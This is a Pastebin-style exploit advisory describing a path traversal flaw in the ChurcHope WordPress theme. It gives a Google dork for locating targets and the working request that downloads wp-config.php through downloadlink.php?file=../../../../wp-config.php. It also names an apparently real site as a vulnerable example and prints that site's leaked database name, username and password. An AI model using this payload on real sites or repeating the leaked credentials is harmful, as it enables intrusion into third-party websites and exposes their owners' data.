Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############################################################################################
- # Exploit Title : WordPress 4.7.13 ChurcHope Responsive Themes 4.7.x Database Configuration File Download
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 20/03/2019
- # Vendor Homepage : themeforest.net
- # Software Information Link : themeforest.net/item/churchope-responsive-wordpress-theme/2708562
- # Software Affected Versions : WordPress 4.x - 4.7.13 - Software 4.7.x
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:/wp-content/themes/churchope/
- # Vulnerability Type :
- CWE-16 [ Configuration ]
- CWE-200 [ Information Exposure ]
- CWE-23 [ Relative Path Traversal ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ############################################################################################
- # Impact :
- ***********
- * WordPress 4.x ChurcHope Responsive Themes 4.7.x is prone to a vulnerability that lets attackers download database config file because
- the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files
- within the context of the web server process and obtain potentially sensitive informations.
- * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized
- to have access to that information. * The software has Relative Path Traversal vulnerability and it uses external input to construct
- a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve
- to a location that is outside of that directory.
- ############################################################################################
- # Vulnerable File :
- ****************
- /downloadlink.php
- # Vulnerable Parameter :
- **********************
- ?file=
- # Database Configuration File Download Exploit :
- ********************************************
- /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
- Informations About MySQL Database Configuration File =>
- ****************************************************
- ** The name of the database for WordPress */
- define('DB_NAME', '');
- /** MySQL database username */
- define('DB_USER', '');
- /** MySQL database password */
- define('DB_PASSWORD', '');
- /** MySQL hostname */
- define('DB_HOST', '');
- ############################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] alexanderfaranpojo.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
- ** The name of the database for WordPress
- */
- define('DB_NAME', 'alexand3_wpAFM');
- /
- ** MySQL database username
- */
- define('DB_USER', 'alexand3_wpAFM');
- /
- ** MySQL database password
- */
- define('DB_PASSWORD', 'c8Se4dP7fr');
- /
- ** MySQL hostname
- */
- define('DB_HOST', 'localhost');
- /
- ** Database Charset to use in creating database tables.
- */
- define('DB_CHARSET', 'utf8');
- /**
- ############################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement